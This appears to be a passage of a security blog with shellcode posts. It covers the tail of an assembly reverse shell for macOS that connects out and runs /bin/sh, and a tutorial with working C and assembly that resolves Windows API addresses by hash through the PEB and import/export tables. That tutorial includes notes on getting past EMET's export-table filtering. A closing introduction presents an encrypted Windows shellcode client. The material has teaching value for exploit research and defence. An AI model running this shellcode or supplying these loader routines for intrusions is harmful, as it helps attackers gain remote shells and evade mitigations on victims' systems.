    mov     al, 97           ; eax = sys_socket
    syscall
    
    xchg    eax, edi         ; edi=sockfd, eax=2 (the old AF_INET value)
    xchg    eax, esi         ; esi=2
    
    ; step 2, assign socket handle to stdin,stdout,stderr
    ; dup2(sockfd, FILENO_STDIN)
    ; dup2(sockfd, FILENO_STDOUT)
    ; dup2(sockfd, FILENO_STDERR)
dup_loop64:
    push    rbp
    pop     rax              ; eax = 0x02000000 
    mov     al, 90           ; rax=sys_dup2
    syscall
    dec     esi              ; 2, 1, 0, then -1 ends the loop
    jns     dup_loop64       ; jump if not signed
    
    ; step 3, connect to remote host
    ; connect (sockfd, {AF_INET,1234,127.0.0.1}, 16);
    push    rbp
    pop     rax
    push    rsp
    pop     rsi              ; rsi = &sa (top of stack)
    mov     dl, 16           ; rdx=sizeof(sa)
    mov     al, 98           ; rax=sys_connect
    syscall    
    
    ; step 4, execute /bin/sh
    ; execve("/bin//sh", NULL, 0);
    push    rax
    pop     rsi              ; rsi = result of connect (expected 0) = argv
    push    rbp
    pop     rax
    cdq                      ; rdx=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    mov     al, 59           ; rax=sys_execve
    syscall

Sources

See here but bear in mind the x86 code hasn’t been tested.

Thanks to 0x4d_ for helping fix problems with initial codes.

Posted in assembly, osx, security, shellcode | Tagged , , , | Leave a comment

Shellcode: Resolving API addresses in memory

Introduction

A basic but core function of all Position Independent Code (PIC) for windows is to resolve the address of API functions at runtime. It’s an important task with a number of options available. Here, we’ll examine 2 popular methods using the Import Address Table (IAT) and Export Address Table (EAT) which are by far the most stable. (for this kind of code)

Since the release of Windows Vista in 2007, Address space layout randomization (ASLR) is enabled for executables and dynamic link libraries specifically linked to be ASLR-enabled which mitigates exploitation of vulnerabilities.

But even long before ASLR arrived, virus writers over 20 years ago faced a similar problem with the unintentional “randomization” of the base address for kernel32.dll.

The first Windows 95 virus called Bizatch was written by Quantum/VLAD on a beta copy of Windows 95. The virus used hardcoded API and as a result simply crashed on versions of windows that had a different base address for kernel32.dll.

Mr. Sandman, Jacky Qwerty and GriYo discussed “the kernel32 problem” and “the GetModuleHandle solution” in PE infection under Win32 and weren’t aware of the Process Environment Block (PEB) under NT at the time which was discussed later by Ratter in Gaining important datas from PEB under NT boxes.

Jacky Qwerty published A GetProcAddress-alike utility which initially became a “standard” method of resolving API addresses in viruses.

At some point after this, authors started resolving the API by CRC32 checksum, presumably to hide strings of API in their code and also to reduce space.

LethalMind showed in 1999 a way to resolve API using his own checksum in Retrieving API Addresses. Then of course LSD group proposed in 2002 their own ARX based algorithm in WIN32 Assembly components (shellcodes) which was the basis for many win32 shellcodes that followed.

That’s just a brief (potentially inaccurate) historical context of where most of the basic ideas for resolving API came from. Today of course, there are many more advanced challenges to overcome when exploiting vulnerabilities but they are largely related to protection mechanisms and not what I’ll discuss here.

All the structures displayed here can be found in WinNT.h from the Microsoft SDK which should be included with MSVC if you have it installed.

You can find detailed description of PE/PE+ format in pecoff.docx

Image DOS Header

At the start of every PE file we find an MS-DOS executable or a “stub” that makes any PE file a valid MS-DOS executable.

The only field we need here is e_lfanew which when added to the current base address of module gives us a pointer to IMAGE_NT_HEADERS

// DOS .EXE header
typedef struct _IMAGE_DOS_HEADER {      
    WORD   e_magic;     // Magic number
    WORD   e_cblp;      // Bytes on last page of file
    WORD   e_cp;        // Pages in file
    WORD   e_crlc;      // Relocations
    WORD   e_cparhdr;   // Size of header in paragraphs
    WORD   e_minalloc;  // Minimum extra paragraphs needed
    WORD   e_maxalloc;  // Maximum extra paragraphs needed
    WORD   e_ss;        // Initial (relative) SS value
    WORD   e_sp;        // Initial SP value
    WORD   e_csum;      // Checksum
    WORD   e_ip;        // Initial IP value
    WORD   e_cs;        // Initial (relative) CS value
    WORD   e_lfarlc;    // File address of relocation table
    WORD   e_ovno;      // Overlay number
    WORD   e_res[4];    // Reserved words
    WORD   e_oemid;     // OEM identifier (for e_oeminfo)
    WORD   e_oeminfo;   // OEM information; e_oemid specific
    WORD   e_res2[10];  // Reserved words
    LONG   e_lfanew;    // File address of new exe header
  } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

Image NT Headers

Because the base address for mapped PE image in memory can be “random”, only the Relative Virtual Address (RVA) of important structures are saved in PE file.

To convert a RVA to Virtual Address (VA) we can use the following macro.

// Convert a Relative Virtual Address into a pointer of the given type:
// (type)(base + rva). base and rva are parenthesized so that expression
// arguments (e.g. "a ? b : c" or "x | y") are evaluated as a whole
// before the addition.
#define RVA2VA(type, base, rva) (type)((ULONG_PTR)(base) + (rva))

Once we add e_lfanew to the base address, we then have a pointer to IMAGE_NT_HEADERS.

The following 2 structures are defined in WinNT.h but only one is used depending on architecture C code is compiled for.

We’re interested in the OptionalHeader field which contains among other things information about import and export directories.

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef struct _IMAGE_NT_HEADERS {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

Image Optional Header

At the end of Optional Header is an array of IMAGE_DATA_DIRECTORY structures.

// Directory Entries

#define IMAGE_DIRECTORY_ENTRY_EXPORT 0   // Export Directory
#define IMAGE_DIRECTORY_ENTRY_IMPORT 1   // Import Directory
//
// Optional header format.
//

typedef struct _IMAGE_OPTIONAL_HEADER {
  //
  // Standard fields.
  //

  WORD    Magic;
  BYTE    MajorLinkerVersion;
  BYTE    MinorLinkerVersion;
  DWORD   SizeOfCode;
  DWORD   SizeOfInitializedData;
  DWORD   SizeOfUninitializedData;
  DWORD   AddressOfEntryPoint;
  DWORD   BaseOfCode;
  DWORD   BaseOfData;

  //
  // NT additional fields.
  //

  DWORD   ImageBase;
  DWORD   SectionAlignment;
  DWORD   FileAlignment;
  WORD    MajorOperatingSystemVersion;
  WORD    MinorOperatingSystemVersion;
  WORD    MajorImageVersion;
  WORD    MinorImageVersion;
  WORD    MajorSubsystemVersion;
  WORD    MinorSubsystemVersion;
  DWORD   Win32VersionValue;
  DWORD   SizeOfImage;
  DWORD   SizeOfHeaders;
  DWORD   CheckSum;
  WORD    Subsystem;
  WORD    DllCharacteristics;
  DWORD   SizeOfStackReserve;
  DWORD   SizeOfStackCommit;
  DWORD   SizeOfHeapReserve;
  DWORD   SizeOfHeapCommit;
  DWORD   LoaderFlags;
  DWORD   NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;

Image Data Directory

Each directory holds an RVA and the size of the directory data. To access the export or import directory, simply add the VirtualAddress to base using RVA2VA macro.

//
// Directory format.
//

typedef struct _IMAGE_DATA_DIRECTORY {
    DWORD   VirtualAddress;
    DWORD   Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES    16
  • VirtualAddress
  • RVA of the data structure. For example, if this structure is for import symbols, this field contains the RVA of the IMAGE_IMPORT_DESCRIPTOR array.

  • Size
  • Contains the size in bytes of the data structure referred to by VirtualAddress.

Image Export Directory

Since exports are first in the list of directories, let’s examine this method of retrieval.

//
// Export Format
//

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;     // RVA from base of image
    DWORD   AddressOfNames;         // RVA from base of image
    DWORD   AddressOfNameOrdinals;  // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

We’re interested in 5 fields.

  • Name
  • RVA of a string for DLL name.

  • NumberOfNames
  • The number of exported API by name.

  • AddressOfFunctions
  • RVA to array of RVAs. When each RVA is added to base address of module, they will give us the address of an exported API.

  • AddressOfNames
  • RVA to array of RVAs. When each RVA is added to base address of module, it will give us the address of a null terminated string representing an exported API.

  • AddressOfNameOrdinals
  • RVA to array of ordinals. Each ordinal represents an index in AddressOfFunctions array.

The following function will retrieve an API address from the export table using CRC-32C of DLL and API name.

base parameter is obviously base address of DLL and hash is derived from the addition of 2 CRC-32C hashes. crc32c(DLL string) + crc32c(API string).

// Look up an exported function in the module mapped at base.
// hash = crc32c(DLL name) + crc32c(API name).
// Returns the address of the export, or NULL when the module has no
// export directory, exports nothing by name, or no name matches.
// Names are scanned from the last entry of AddressOfNames to the first.
LPVOID search_exp(LPVOID base, DWORD hash)
{
  PIMAGE_DOS_HEADER       mz;
  PIMAGE_NT_HEADERS       pe;
  PIMAGE_DATA_DIRECTORY   dd;
  PIMAGE_EXPORT_DIRECTORY ed;
  PDWORD                  funcs, names;
  PWORD                   ords;
  PCHAR                   name;
  DWORD                   exp_rva, idx, dll_hash;

  mz      = (PIMAGE_DOS_HEADER)base;
  pe      = RVA2VA(PIMAGE_NT_HEADERS, base, mz->e_lfanew);
  dd      = (PIMAGE_DATA_DIRECTORY)pe->OptionalHeader.DataDirectory;
  exp_rva = dd[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;

  // module without an export table
  if (exp_rva == 0) {
    return NULL;
  }

  ed  = (PIMAGE_EXPORT_DIRECTORY) RVA2VA(ULONG_PTR, base, exp_rva);
  idx = ed->NumberOfNames;

  // nothing exported by name
  if (idx == 0) {
    return NULL;
  }

  funcs = RVA2VA(PDWORD, base, ed->AddressOfFunctions);
  names = RVA2VA(PDWORD, base, ed->AddressOfNames);
  ords  = RVA2VA(PWORD,  base, ed->AddressOfNameOrdinals);

  // hash of the DLL name is the same for every export, compute it once
  dll_hash = crc32c(RVA2VA(PCHAR, base, ed->Name));

  for (; idx != 0; idx--) {
    name = RVA2VA(PCHAR, base, names[idx - 1]);

    if (crc32c(name) + dll_hash == hash) {
      // name index -> ordinal -> function RVA -> address
      return RVA2VA(LPVOID, base, funcs[ords[idx - 1]]);
    }
  }
  return NULL;
}

One important thing to mention is that this function does not resolve API by ordinal nor does it resolve forward references which can sometimes be a problem.

Here’s some assembly to perform the same thing.

; Resolve an API address by walking the export directory of one module.
;
; in:  ebx = base of module to search
;      ecx = hash to find, crc32c(DLL name) + crc32c(API name)
;
; out: eax = api address resolved in EAT, or 0 when the module has no
;            export directory, no names, or no name matches
;
; NOTE(review): _eax, _ecx and _edx are defined outside this snippet;
; they appear to be the offsets of the saved registers inside the PUSHAD
; frame. If so, the saved-EDX slot doubles as storage for the DLL hash
; and the caller's EDX comes back overwritten after POPAD - confirm.
; crc32c (defined elsewhere) is assumed to take a string pointer in EAX,
; return the hash in EAX and leave the other registers alone.
;
search_expx:
    pushad
    ; eax = IMAGE_DOS_HEADER.e_lfanew
    mov    eax, [ebx+3ch]

    ; first directory is export
    ; ecx = IMAGE_DATA_DIRECTORY.VirtualAddress
    mov    ecx, [ebx+eax+78h]
    jecxz  exp_l2      ; no export directory: return ecx = 0

    ; eax = crc32c(IMAGE_EXPORT_DIRECTORY.Name)
    mov    eax, [ebx+ecx+0ch]
    add    eax, ebx
    call   crc32c
    mov    [esp+_edx], eax   ; keep the DLL hash in the frame

    ; esi = &IMAGE_EXPORT_DIRECTORY.NumberOfNames
    ; the next four dwords are NumberOfNames, AddressOfFunctions,
    ; AddressOfNames and AddressOfNameOrdinals
    lea    esi, [ebx+ecx+18h]
    push   4
    pop    ecx         ; load 4 RVA
exp_l0:
    lodsd              ; load RVA
    add    eax, ebx    ; eax = RVA2VA(ebx, eax)
    push   eax         ; save VA
    loop   exp_l0

    ; pop in reverse order of the pushes above
    pop    edi          ; edi = AddressOfNameOrdinals
    pop    edx          ; edx = AddressOfNames
    pop    esi          ; esi = AddressOfFunctions
    pop    ecx          ; ecx = NumberOfNames

    ; NumberOfNames is a count, not an RVA, so take the base off again
    sub    ecx, ebx     ; ecx = VA2RVA(NumberOfNames, base)
    jz     exp_l2       ; exit if no api
exp_l3:
    mov    eax, [edx+4*ecx-4] ; get RVA of API string, last name first
    add    eax, ebx           ; eax = RVA2VA(eax, ebx)
    call   crc32c             ; generate crc32 of api string
    add    eax, [esp+_edx]    ; add crc32 of DLL string

    cmp    eax, [esp+_ecx]    ; found match?
    loopne exp_l3             ; --ecx && eax != hash
    jne    exp_l2             ; exit if not found (ecx = 0 here)

    ; match: ecx was already decremented, so it is the index of the name
    xchg   eax, ebx           ; eax = base
    xchg   eax, ecx           ; eax = name index, ecx = base

    movzx  eax, word [edi+2*eax] ; eax = AddressOfNameOrdinals[eax]
    add    ecx, [esi+4*eax] ; ecx = base + AddressOfFunctions[eax]
exp_l2:
    mov    [esp+_eax], ecx  ; result is handed back through the frame
    popad
    ret

So that’s the basic method to search through exports. Now for the imports which is a little trickier.

Image Import Descriptor

The release of Enhanced Mitigation Experience Toolkit (EMET) by Microsoft in 2009 broke some existing shellcodes that searched the export directory for API.

EMET includes Export Address Table Access Filtering (EAF) and EAF+ since the release of 5.2, both of which serve to block read attempts of the export and import directories originating from modules commonly used to probe memory during the exploitation of vulnerabilities.

Typically, a shellcode using the IAT will resolve addresses for GetModuleHandle and GetProcAddress before resolving the rest by string.

If a PE file imports API from other modules, the import directory will contain an array of image import descriptors, each one representing a module.

typedef struct _IMAGE_IMPORT_DESCRIPTOR {
  union {
    DWORD Characteristics; // 0 for terminating null import descriptor
    DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA)
  } DUMMYUNIONNAME;
  DWORD TimeDateStamp;        // 0 if not bound,
                              // -1 if bound, and real date\time stamp
                              //  in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
                              // O.W. date/time stamp of DLL bound to (Old BIND)

  DWORD ForwarderChain;       // -1 if no forwarders
  DWORD Name;
  DWORD FirstThunk;           // RVA to IAT (if bound this IAT has actual addresses)
} IMAGE_IMPORT_DESCRIPTOR;
typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR;

The 3 fields we’re interested in are:

  • OriginalFirstThunk
  • Contains offsets to the names of the imported functions.

  • Name
  • Null terminated string of the module to import API from.

  • FirstThunk
  • Contains offsets to the actual addresses of the functions.

Image Thunk Data

Each descriptor contains RVA that points to array of Image Thunk Data structures. Each entry represents information about the imported API.

typedef struct _IMAGE_THUNK_DATA32 {
    union {
        DWORD ForwarderString;      // PBYTE 
        DWORD Function;             // PDWORD
        DWORD Ordinal;
        DWORD AddressOfData;        // PIMAGE_IMPORT_BY_NAME
    } u1;
} IMAGE_THUNK_DATA32;
typedef IMAGE_THUNK_DATA32 * PIMAGE_THUNK_DATA32;

In the code, I skip entries that are imported by ordinal.

The AddressOfData from OriginalFirstThunk is an RVA that points to an IMPORT_BY_NAME structure.

The Function field from FirstThunk points to actual address of API function we’re searching for.

Import By Name

Since we’re not importing by ordinal, we don’t care about the hint field, just the name which is null terminated API string.

typedef struct _IMAGE_IMPORT_BY_NAME {
    WORD    Hint;
    BYTE    Name[1];
} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME;
  • Hint
  • Contains an index into the export table of the DLL the function resides in. This field is for use by the PE loader so it can look up the function in the DLL’s export table quickly.This value is not essential and some linkers may set the value in this field to 0.

  • Name
  • Contains the name of the import function. The name is an ASCIIZ string. Note that Name’s size is defined as byte but it’s really a variable-sized field. It’s just that there is no way to represent a variable-sized field in a structure. The structure is provided so that you can refer to the data structure with descriptive names.

The following code will search import address table for API address using CRC-32C hash of DLL and API strings.

// Look up an imported function in the import table of the module mapped
// at base. hash = crc32c(DLL name) + crc32c(API name).
// Returns the address stored in the matching FirstThunk entry, or NULL
// when the module has no import directory or no import matches.
// Entries imported by ordinal are skipped.
LPVOID search_imp(LPVOID base, DWORD hash)
{
  PIMAGE_DOS_HEADER        mz;
  PIMAGE_NT_HEADERS        pe;
  PIMAGE_DATA_DIRECTORY    dd;
  PIMAGE_IMPORT_DESCRIPTOR desc;
  PIMAGE_THUNK_DATA        name_thunk, addr_thunk;
  PIMAGE_IMPORT_BY_NAME    by_name;
  DWORD                    imp_rva, dll_hash;
  LPVOID                   found = NULL;

  mz      = (PIMAGE_DOS_HEADER)base;
  pe      = RVA2VA(PIMAGE_NT_HEADERS, base, mz->e_lfanew);
  dd      = (PIMAGE_DATA_DIRECTORY)pe->OptionalHeader.DataDirectory;
  imp_rva = dd[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;

  // module without an import table
  if (imp_rva == 0) {
    return NULL;
  }

  desc = (PIMAGE_IMPORT_DESCRIPTOR) RVA2VA(ULONG_PTR, base, imp_rva);

  // one descriptor per imported DLL
  while (found == NULL)
  {
    // a descriptor without a name ends the array
    if (desc->Name == 0) {
      return NULL;
    }

    dll_hash = crc32c(RVA2VA(PCHAR, base, desc->Name));

    // the two thunk arrays run in parallel: names and resolved addresses
    name_thunk = (PIMAGE_THUNK_DATA)
        RVA2VA(ULONG_PTR, base, desc->OriginalFirstThunk);
    addr_thunk = (PIMAGE_THUNK_DATA)
        RVA2VA(ULONG_PTR, base, desc->FirstThunk);

    for (; name_thunk->u1.Ordinal != 0; name_thunk++, addr_thunk++)
    {
      // only imports by name can be hashed
      if (!IMAGE_SNAP_BY_ORDINAL(name_thunk->u1.Ordinal))
      {
        by_name = (PIMAGE_IMPORT_BY_NAME)
            RVA2VA(ULONG_PTR, base, name_thunk->u1.AddressOfData);

        if (hash == (crc32c(by_name->Name) + dll_hash)) {
          found = (LPVOID)addr_thunk->u1.Function;
          break;
        }
      }
    }
    desc++;
  }
  return found;
}

The assembly follows the same algorithm as above but with some optimizations.

; Resolve an API address by walking the import descriptors of one module.
;
; in: ebx = base of module to search
;     ecx = hash to find, crc32c(DLL name) + crc32c(API name)
;
; out: eax = api address resolved in IAT, or 0 when the module has no
;            import directory or no import matches
;
; NOTE(review): _eax, _ecx and _edx are defined outside this snippet;
; they appear to be the offsets of the saved registers inside the PUSHAD
; frame. If so, the saved-EDX slot doubles as storage for the DLL hash
; and the caller's EDX comes back overwritten after POPAD - confirm.
; crc32c (defined elsewhere) is assumed to take a string pointer in EAX,
; return the hash in EAX and leave the other registers alone.
;
search_impx:
    xor    eax, eax    ; api_adr = NULL
    pushad
    ; eax = IMAGE_DOS_HEADER.e_lfanew
    mov    eax, [ebx+3ch]
    add    eax, 8     ; add 8 for import directory (second 8-byte entry)

    ; eax = IMAGE_DATA_DIRECTORY.VirtualAddress
    mov    eax, [ebx+eax+78h]
    test   eax, eax
    jz     imp_l2        ; no import directory: return 0

    lea    ebp, [eax+ebx] ; ebp = first import descriptor
imp_l0:
    mov    esi, ebp      ; esi = current descriptor
    lodsd                ; OriginalFirstThunk +00h
    xchg   eax, edx      ; temporarily store in edx
    lodsd                ; TimeDateStamp      +04h
    lodsd                ; ForwarderChain     +08h
    lodsd                ; Name               +0Ch
    test   eax, eax
    jz     imp_l2        ; if (Name == 0) goto imp_l2;

    add    eax, ebx      ; eax = address of DLL name
    call   crc32c
    mov    [esp+_edx], eax ; keep the DLL hash in the frame

    lodsd                 ; FirstThunk
    mov    ebp, esi       ; ebp = next descriptor

    lea    esi, [edx+ebx] ; esi = OriginalFirstThunk + base
    lea    edi, [eax+ebx] ; edi = FirstThunk + base
imp_l1:
    lodsd                 ; eax = oft->u1.AddressOfData, oft++;
    scasd                 ; ft++; (used only for its pointer increment)
    test   eax, eax       ; if (oft->u1.Function == 0)
    jz     imp_l0         ; goto imp_l0
    js     imp_l1         ; oft->u1.Ordinal & IMAGE_ORDINAL_FLAG

    lea    eax, [eax+ebx+2] ; oft->Name_, +2 skips the WORD Hint
    call   crc32c           ; get crc of API string

    add    eax, [esp+_edx]  ; eax = api_h + dll_h
    cmp    [esp+_ecx], eax  ; found match?
    jne    imp_l1

    mov    eax, [edi-4]     ; ft->u1.Function (edi was already advanced)
imp_l2:
    mov    [esp+_eax], eax  ; result is handed back through the frame
    popad
    ret

Process Environment Block

Perhaps this part should precede everything else?

Another “advancement” arrived with the publication of Gaining important datas from PEB under NT boxes by Ratter/29A in 2002. There was a better way to obtain base address of KERNEL32.DLL simply by reading it from the PEB.

Here I’m using structures from Matt Graeber’s PIC_Bindshell

// Resolve an API by hash across every module in the PEB loader list
// (load order). Each module is searched with search_imp; the first
// non-NULL result is returned, NULL if the list ends without a match.
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY entry;
  LPVOID                   found=NULL;
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr   = (PMY_PEB_LDR_DATA)peb->Ldr;
  entry = (PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
  
  // an entry without a base address marks the end of the walk
  while (entry->DllBase != NULL)
  {
    found = search_imp(entry->DllBase, dwHash);
    if (found != NULL) {
      break;
    }
    entry = (PMY_LDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;
  }
  return found;
}

The assembly is based on the same algorithm, with some minor optimizations.

; LPVOID get_apix(DWORD hash);
;
; Walks the load-order module list reached through the PEB and calls
; search_expx for each module until it returns non-zero or an entry with
; a NULL DllBase is reached.
;
; in:  [esp+4] = hash (stack argument)
; out: eax     = value returned by search_expx, or 0 if no module matched
; All other general registers are restored by popad.
; NOTE(review): search_expx and _eax are defined outside this view;
; presumably search_expx takes ebx = module base and ecx = hash and
; preserves edi, and _eax is the offset of the saved eax in the pushad
; frame - confirm.
get_apix:
_get_apix:
    pushad
    mov    ecx, [esp+32+4] ; ecx = hash (32 bytes of pushad frame + 4 for return address)
    push   30h
    pop    eax             ; eax = 30h

    mov    eax, [fs:eax]  ; eax = (PPEB) __readfsdword(0x30);
    mov    eax, [eax+0ch] ; eax = (PMY_PEB_LDR_DATA)peb->Ldr
    mov    edi, [eax+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
    jmp    gapi_l1        ; test DllBase of the first entry before searching
gapi_l0:
    call   search_expx
    test   eax, eax
    jnz    gapi_l2        ; non-zero result: done

    mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink
gapi_l1:
    mov    ebx, [edi+18h] ; ebx = dte->DllBase
    test   ebx, ebx
    jnz    gapi_l0        ; keep going while DllBase != NULL
    xchg   eax, ebx       ; ebx is zero here, so eax = 0 (not found)
gapi_l2:
    mov    [esp+_eax], eax ; store result in the saved-register frame so popad loads it
    popad
    ret

Hash algorithm

For both examples, I use CRC-32C checksum. The C stands for Castagnoli polynomial. I’ve used it simply because there were no collisions for 80,000 API tested. Some existing hash algorithms provide “good enough” results but the advantage of using CRC-32C is that it is now supported by INTEL cpus since the release of SSE4.2

It should be clear however that the OR operation of bytes with 0x20 is not part of the CRC-32C specification. This is only here to convert strings to lowercase before hashing. Sometimes kernel32.dll can appear as uppercase so it should be converted to lowercase.

In the Metasploit code, the module is converted to uppercase instead.

// CRC-32C (reflected Castagnoli polynomial 0x82F63B78) over a
// NUL-terminated string. Every byte, including the terminator, is
// OR'ed with 0x20 before being folded in, so ASCII letter case is
// ignored. Initial value is 0 and there is no final inversion.
uint32_t crc32c(const char *s)
{
  uint32_t sum = 0;
  uint8_t  raw;
  int      bit;

  for (;;) {
    raw  = (uint8_t)*s++;
    sum ^= (uint8_t)(raw | 0x20);

    // shift out one bit at a time, applying the polynomial on a set bit
    for (bit = 8; bit != 0; bit--) {
      if (sum & 1) {
        sum = (sum >> 1) ^ 0x82F63B78;
      } else {
        sum >>= 1;
      }
    }
    // the terminator has already been hashed when we stop
    if (raw == 0) break;
  }
  return sum;
}

Here’s the code using built in instruction.

; CRC-32C of a string using the SSE4.2 crc32 instruction
; in:  esi = s (NUL-terminated)
; out: edx = crc-32c(s), every byte OR'ed with 0x20 (terminator included)
;
    xor    eax, eax          ; eax = 0
    cdq                      ; edx = 0 (initial crc)
crc_l0:
    lodsb                    ; al = *s++
    or     al, 0x20          ; fold ASCII letters to lowercase
    crc32  edx, al           ; accumulate byte into crc
    cmp    al, 0x20          ; NUL | 0x20 == 0x20 (a space also ends the loop)
    jne    crc_l0            ; was jns: SF is clear when al == 0x20, so it never stopped on the terminator

Here’s code for CPUs without the support for SSE4.2

; Bitwise CRC-32C for CPUs without SSE4.2.
; in:  eax = s (NUL-terminated string)
; out: eax = crc-32c(s); all other general registers are restored by popad
;
; Each byte is OR'ed with 0x20 before hashing, so ASCII letter case is
; ignored. The terminator is hashed too (as 0x20); the loop ends when the
; OR'ed byte equals 0x20, so a space character also ends the string.
; NOTE(review): _eax is defined outside this view; presumably the offset
; of the saved eax in the pushad frame - confirm.
;
crc32c:    
    pushad
    xchg   eax, esi          ; esi = s
    xor    eax, eax          ; eax = 0
    cdq                      ; edx = 0 (crc)
crc_l0:
    lodsb                    ; al = *s++
    or     al, 0x20          ; al |= 0x20
    xor    dl, al            ; crc ^= c
    push   8
    pop    ecx               ; ecx = 8 bits to process
crc_l1:
    shr    edx, 1            ; crc >>= 1, shifted-out bit goes to CF
    jnc    crc_l2            ; bit was 0: no polynomial
    xor    edx, 0x82F63B78   ; bit was 1: apply Castagnoli polynomial
crc_l2:
    loop   crc_l1            ; repeat for all 8 bits
    sub    al, 0x20          ; until al==0 (byte was the terminator)
    jnz    crc_l0    
    mov    [esp+_eax], edx   ; store crc in the saved-register frame so popad loads it into eax
    popad
    ret

Of course, CRC-32C is not collision resistant. In some cases, you might need to consider using a cryptographic hash algorithm. The smallest I can think of would be CubeHash by Daniel Bernstein.

Although, you could also use a tiny block or stream cipher to encrypt the strings and truncate the ciphertext to 32 or 64-bits. Not sure how collision resistant that would be but it’s worth exploring.

Summary

Parsing the import and export tables isn’t really a difficult task. With all the sources and documentation available, there’s really no excuse to avoid using either in a PIC. Using hardcoded API or looking up by ordinal is a recipe for disaster.

By writing your code in C first and generating assembly output with /FAs switch of MSVC, this should make parsing in assembly much easier to understand.

getapi.c contains code in C to locate API by CRC-32C hash. x86.asm and x64.asm contain the code in assembly to locate API by CRC-32C hash.

Posted in assembly, programming, shellcode, windows | Tagged , , , , , , , , | 2 Comments

Shellcode: A Windows PIC using RSA-2048 key exchange, AES-256, SHA-3

Introduction

This won’t be a tutorial on writing shellcode although you might glean something useful from the source code when writing your own PIC in C. This is a PIC (Position Independent Code) for the Windows Operating System written in C with some additional assembly code to handle stack limit issues. There are C arrays of the assembly code for x86 here and for x64 here. You must change the IP address from 127.0.0.1 and port number 1234 if testing for remote systems.

The idea of writing windows shellcodes with C is nothing new and was demonstrated by a number of people already. AFAIK, the first example of this was shown by Didier Stevens in his 2010 article for hakin9 magazine simply called Writing WIN32 Shellcode With a C-compiler.

Nick Harbour also discusses the idea in Writing Shellcode with a C Compiler and Matt Graeber shows how to build a bind shell in his article Writing Optimized Windows Shellcode in C which I’ve borrowed some ideas and code from for my own PIC.

Just this year, a Shellcode Compiler was released which can compile a script into assembly. Of course there are other source codes out there such as this and even a c++ example such as this taking advantage of the constexpr feature.

Apologies to anyone who has been involved with this subject that I missed.

In March this year, I wrote a 4 part series on some simple interactive “shells” for the windows operating system and the PIC client here can be used with this server which is derived from s4.c discussed in Part 4. The main difference is the PIC client and new server both use SHA-3 and AES-256 for authenticated encryption with some modular arithmetic functions to perform key exchange similar to RSA.

Those of you familiar with shellcode found in generators such as Veil, Metasploit or at online shellcode databases like Exploit Database will know they do not use encrypted communication between two hosts except if using WININET API for TLS connections or a static key with RC4.

I’ll just briefly discuss some things that are good to know when writing your own PIC in C for Windows. I’ll continue to update this as code develops.

  1. C or C++?
  2. C or ASM?
  3. Memory layout
  4. Resolving API
  5. Storing strings
  6. CPU intrinsics
  7. Big number arithmetic
  8. Authenticated Encryption
  9. Todo

C or C++?

Those of you familiar with OOP (Object Oriented Programming) languages will know what a class is and the purpose of properties and methods.

C is a POP (Procedure Oriented Programming) language which doesn’t support classes but we can emulate them using structures and the reason I’m using C and not C++ to write a PIC has nothing to do with understanding object oriented concepts. I just feel C++ is too close to Java, .NET and other managed code which all hide a lot of low level code from the programmer.

There are new features of C++ that would be invaluable for developing PICs and I encourage anyone to explore its features and not be dissuaded by my decision to use C instead.

One such feature is the constexpr specifier which is incredibly useful for generating hashes of strings at compile time whereas with C, they need to be hardcoded unless linking with some assembly code containing macros.

A structure is used in my own PIC to emulate a class since most of the functions must be resolved at runtime. This structure is passed to each procedure so that it can access what I’ll refer to in future as global memory.

C or ASM?

Traditionally, shellcodes have always been written in assembly for the target architecture an operating system runs on. But as the hardware technology advanced over the last 20 years, so did complexity of operating systems and there was also the birth of new languages designed to be more cost effective for a business. The consequence of these advancements led to fewer and fewer people writing applications in assembly since the hardware no longer suffered limitations of early personal computers.

RAM and ROM space are no longer a factor for the majority of computing devices running an operating system. Compilers are efficient at generating code either optimized for speed or size and high level languages for the most part offer the ability to rapidly develop applications with chance of fewer bugs. Writing assembly today is largely confined to microcomputing devices such as the Atmel AVR 8-bit and 32-bit Microcontrollers.

As someone that’s programmed with both C and ASM on and off for some years now, there was a time when I thought assembly was the only language for writing shellcode. But the kinds of shellcode I was writing back then were very simple and there wasn’t any consideration for information transmitted between two systems being compromised by a third party. So when I decided to try writing shellcode that used encryption, I knew there would be a lot of code involved and that it would be a nightmare to debug so I opted to write it in C first just to get something working.

